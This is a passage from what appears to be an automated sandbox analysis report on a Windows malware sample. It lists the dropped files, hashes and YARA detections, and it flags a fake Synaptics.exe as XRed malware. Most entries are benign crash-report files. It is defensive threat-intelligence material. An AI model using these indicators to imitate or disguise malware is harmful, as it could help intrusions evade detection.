6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_3289285f9ad88d50b4ec103b7b95cad4d32d02d_455b7b6e_c4d3ea59-314f-4a4b-9798-81e07d2df517\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1329813972324503
Encrypted:	false
SSDEEP:	192:mlb2VpsG+oImp0WbkODzJDzqjLOA/FczxwzuiFaZ24IO8EKDzy:TyGpAWbkOJqjkKzuiFaY4IO8zy
MD5:	DAF8BA4B38236A41071CD022371430E5
SHA1:	3A196C7CDD98987DA438F084E1373C98B474ECDE
SHA-256:	21A67A4D75623D91392F5F566CD65F42DEEA99B2220736CD002D101953A149C0
SHA-512:	98E7DE95898D2CCC6B33B1914E6439AF59A75D013AB8DBC90DC6855F6065ACD33FECD51B939A1F874B19F996CCB0254084C88B2496A3013A5C7B87326A488A6B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.8.4.8.0.3.4.0.8.3.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.4.8.0.8.2.5.2.1.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.d.3.e.a.5.9.-.3.1.4.f.-.4.a.4.b.-.9.7.9.8.-.8.1.e.0.7.d.2.d.f.5.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.8.4.4.4.e.e.-.8.1.a.1.-.4.7.1.1.-.9.e.a.5.-.6.3.4.8.5.1.3.3.1.2.7.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.6.4.-.0.0.0.1.-.0.0.1.4.-.d.5.8.5.-.5.3.6.2.a.6.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_56f1e7e6dd49e686cdf4ffd820ded92baa13c65_455b7b6e_bcaafa29-1e2e-4016-a48d-690b7846b00a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1338388574686502
Encrypted:	false
SSDEEP:	192:r42VpsMoIm10BU/3DzJDzqjLOA/FczxwzuiFaZ24IO8EKDzy:LyLsBU/3JqjkKzuiFaY4IO8zy
MD5:	A03CFC68F0A7939F61BEEF12BC6BC80A
SHA1:	968AC3DD76D9DD85C234A6AE3325CFEC5495821D
SHA-256:	76B428CFE75FCD9170DED1E570D931CF0CAD04609FEDDBEA835F3FE395494973
SHA-512:	E901BB89A978E8B62EA04CFECFA41F784AB8F920C4AF9478FC74255C598F7118E16E9A5DF4996083B3609158911E137C87D2161E746854459C997EE2F7EB8DD7
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.8.4.7.1.4.0.6.1.9.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.4.7.2.8.5.9.2.9.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.a.a.f.a.2.9.-.1.e.2.e.-.4.0.1.6.-.a.4.8.d.-.6.9.0.b.7.8.4.6.b.0.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.3.b.e.6.4.2.-.f.6.c.b.-.4.0.0.6.-.8.2.6.5.-.1.9.6.2.3.b.c.e.5.a.5.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.6.4.-.0.0.0.1.-.0.0.1.4.-.d.5.8.5.-.5.3.6.2.a.6.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8AEB.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 30 10:34:31 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	391656
Entropy (8bit):	2.1470576771307437
Encrypted:	false
SSDEEP:	1536:ihF9lvmoTX17tvUpdmbyHfWRVJB8mI7RyChtYRoUcbWfvv/3VI66KILjBP9y9OuM:irRaWD2l7XsbV69yozF
MD5:	CE708C57F34BA6658C56D6F40A099C27
SHA1:	FA8BA4BB65EBD2C021A54026DAC9A3FC63B04360
SHA-256:	24CBF005178626F082F7FF02031C92E0E23E4A23EF47B2AB945FCFE55781A135
SHA-512:	3395F1FB87050AAAC5C568A88BFECAA02B3B52C40E297561749539086C383719FFD1A7A7C255FD6E0FD11DAE85096DED07020F77320C827A7B8A461D8E7CBA59
Malicious:	false
Preview:	MDMP..a..... .......7wrg............................(.......$...............,...........`.......8...........T...........Hr...........................0..............................................................................eJ......x1......GenuineIntel............T.......d...+wrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D8C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6306
Entropy (8bit):	3.7109025511231444
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbAxl6uYiStQE/muK5aM4U8989bPJSsfy9pm:R6l7wVeJAxl6uYiSteprq89bxSsfybm
MD5:	4F9606E68C3406D27555F76039A1AA56
SHA1:	3BB41ECA2709A96D7DEE0026BCA7AABD7F7E414A
SHA-256:	F6BF7477A0D8EA2BD0D1958ED0BA979CE51BB55557B595311327F9FF876F2DCC
SHA-512:	F3C2E76AEB81391CA1338AB7FF73F2AB31385339993D6D310EA94A057734793F589EB882848FA04664FAD8AC5658BEFE53383D15A040AA4D6511C15BC3D10DF7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DBC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4572
Entropy (8bit):	4.443313080847377
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0Jg77aI9yjRWpW8VYrYm8M4JFLF7+q84XoJZDwMdd:uIjfyI7oA7VjJnJoJZLdd
MD5:	FD981BC95451CBE201EE2587A67B31DA
SHA1:	038206EAE682D7C03397835B1BBAA73559DC1EF4
SHA-256:	CF638DA3FFA9970081FE05AA1820092E31524EEDAF21984621C64B3601C8A509
SHA-512:	148CA1D07EF7150AF4C0B1D4FE7E3F34F4A72A34A3B5C3ABC91032145B1A9C1C687D76D1CF7709E6A4FDAAE5BC91C1D968213320D75E5A5ABB5517C6F63C1CC9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653857" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2B9.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 30 10:34:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	414098
Entropy (8bit):	2.08370893284858
Encrypted:	false
SSDEEP:	1536:+8+BcBfmoTX17tvkUypkbyHfWRVJB8hGMd7Ry0DjYUMoUcT8evv/3VI664ILjBQy:+mhBD2/d71YJGjVR/vr8H
MD5:	B2D2156ECAB514EE444D2D07C996FFC4
SHA1:	5EC982F9FD28453772041C5F312FDFA77A501F69
SHA-256:	222578E05669A9B08F1D2E4A74D6C7DF97FE3941A4CB235050EF9F2080AA068C
SHA-512:	35F37097DCE5B43F27DC3499E4519BBFA27B200C67D4FACBD8A675D548F39AB64BB11301EAD7F10E1709853269CF5426C49CBB7EC3D538BC5D68DB981AD3F8C6
Malicious:	false
Preview:	MDMP..a..... .......=wrg....................................$...`/.......... ...........`.......8...........T........... r..r............/..........p1..............................................................................eJ.......2......GenuineIntel............T.......d...+wrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA54A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6292
Entropy (8bit):	3.7108762913355804
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbAxM6mYiSJTsuK5aMQUwq89bPzSsfj9rm:R6l7wVeJAxM6mYiSJTEpDT89brSsfjZm
MD5:	F4AB5B400B5ED55A830B66FF9C9A736B
SHA1:	1D6A815B45D4EE5FC8DBAA3E4DEBF4158886741E
SHA-256:	C2BA3625D06B2EF9051D35C435D0D8642358E36EC231F53C68C8F2541382DB23
SHA-512:	EE144D72E0F66B8211F7DDB30FEDAB5F092D8CA4079AA2BDA0158B1099A11304B6E8E39AA9112873EE457EE294266183027CB4583A5739D7CFFF4348718A98CB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA599.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4572
Entropy (8bit):	4.443361402075512
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0Jg77aI9yjRWpW8VYnYm8M4JF9Fvx+q84FoJZDwMdd:uIjfyI7oA7VfJRxHoJZLdd
MD5:	75B5E174D153EA571A9618A492B4B5B4
SHA1:	C3D288F595665D8E115E1FDE9127C73E822751BD
SHA-256:	91834677B7A61F5F804608FCD8EEE77C6F6074E6CDE9F0FB1C60854B89CD0883
SHA-512:	A15FFD17B16EBF2087E636FA19202931F9B3D162DEFED3B65DE9B03449EE9627FABA622ED5FD2FD968AC432BEA406201F3A81B192135F49862CB61D96647A5C3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653857" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERADE4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Mon Dec 30 10:34:40 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	60372
Entropy (8bit):	2.5976436936213
Encrypted:	false
SSDEEP:	384:pR/l4v5APvovfBzM/SOq3HdzATaAayPrBI:D94veovfiaFAewPr+
MD5:	E22C6770A6F5F9D44F2744FB1C59B2B6
SHA1:	0745E7CA306B1165878B6BBF44861E137D7D3E25
SHA-256:	A40B6816DDBEB47D0AEC3F54C1AEE7A8DD06BA6EEBE0EA523B9FEB7F77C22336
SHA-512:	19AC884283D78E6E3FFC3CAE2123A3F249874D0827E075C2DEB724E3089594DF0280EF4FC562181F12814893F6B8D9CD7BCCBA52BE08930355867A23EFEFC6C9
Malicious:	false
Preview:	MDMP..a..... .......@wrg............4...............H.......$....&......$....5..........`.......8...........T............k...............'...........)..............................................................................eJ.......)......GenuineIntel............T.......d...+wrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEDF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6296
Entropy (8bit):	3.6909153345773142
Encrypted:	false
SSDEEP:	192:R6l7wVeJAx86cNuYiSJ8pD+89bUSsfbcm:R6lXJP6EuYh2URf1
MD5:	65EBAD28917956912FCEB61EC920274F
SHA1:	7010A8BEF3F4ECFBFDE6B95699D5E227100EFEE6
SHA-256:	77DA7A799C3A50B2F22587C14F5641B61AB5CE5DC0943246DBAC595A759D5881
SHA-512:	D94345E62EF47237CBA13C247CE21C3D49C162E620E70C537D105AAEF5E4166B54697D51546B35FA668A4BEDF4E3EF3CCDCAD3ED86E6F12EC4B56B687618AB75
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEFF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4572
Entropy (8bit):	4.442423102057424
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0Jg77aI9yjRWpW8VYwYm8M4JF9FY+q84FoJZDwMdd:uIjfyI7oA7VMJ+HoJZLdd
MD5:	A29677981D202ED20E1E23887205C9C5
SHA1:	A99A9F542C2F053E19830F83D9460A30496E640F
SHA-256:	5B7BB353FFC0D7D29823CAE73CDD7C40BDC9609EB5C1A1176AD74A84B0B915A5
SHA-512:	FA1FFC49C40850DFB9340142DA5294B6F38910FEE09ADAE74652A4506649A528AE1B65FEF2CAE8619EF59C991702200319A2755ED871DB60774286922DBEB182
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653857" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Synaptics\RCX5CF5.tmp

Download File

Process:	C:\Users\user\Desktop\FGNEBI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	771584
Entropy (8bit):	6.632118854531729
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
MD5:	84A6CCB0838DA0E05CC6763275C2EE1C
SHA1:	E2F47601FCAD62183937567210B5062B0750FA70
SHA-256:	5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
SHA-512:	063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX5CF5.tmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX5CF5.tmp, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Joe Sandbox View:	Filename: LWQDFZ.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe

Download File

Process:	C:\Users\user\Desktop\FGNEBI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1691136
Entropy (8bit):	7.465728800629642
Encrypted:	false
SSDEEP:	24576:gnsJ39LyjbJkQFMhmC+6GD9YhloDX0XOf4tHzneKlVLaqueI0psAzrcP39h:gnsHyjtk2MYC5GDyhloJfaelV6skAfX
MD5:	1585CB2963DCEB92FBCF6C4C057E191E
SHA1:	2063F45E9C82553BBC41CB4BC8E10B2D06D701C9
SHA-256:	67D5FC80B6BF87EB6BC3D505B0102CFDF8E8727D3DA004D982467AB08DED7F0B
SHA-512:	88475B49D4299519B978711B16E0EA40579A3B671EB898D3D3F8391FBC2DE55665BC0A978A20578A4C83F6BF3894A857E4013F34B0E2E4DB6DE404F66EF9CE47
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..........................................@..........................0...................@..............................B......0%...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0%.......&..................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\FGNEBI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\GRfF7Ii.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.2605628298181255
Encrypted:	false
SSDEEP:	24:GgsF+0LUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
MD5:	2D6A37A7630727562B5F884BF1564342
SHA1:	F1D42F5B5AEB66E22337674CED81614FC89D17B3
SHA-256:	E8298F06700D18CB6E4EDCFBB6026DE66F53B5B74CDE9450FC92F6EA6E08B0A7
SHA-512:	50AA4D0BEF047EDA04CE179373F2B83FD4284EC40EE1B0921F45971EF7585E84F626CE458099E7F4BD7DAB7822D11AE9F108F0CCDD5DEAB394DDDE523BB6C878
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7jP43CqhEwbyC5VaLfjtnw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\JUIlYPbf.xlsm
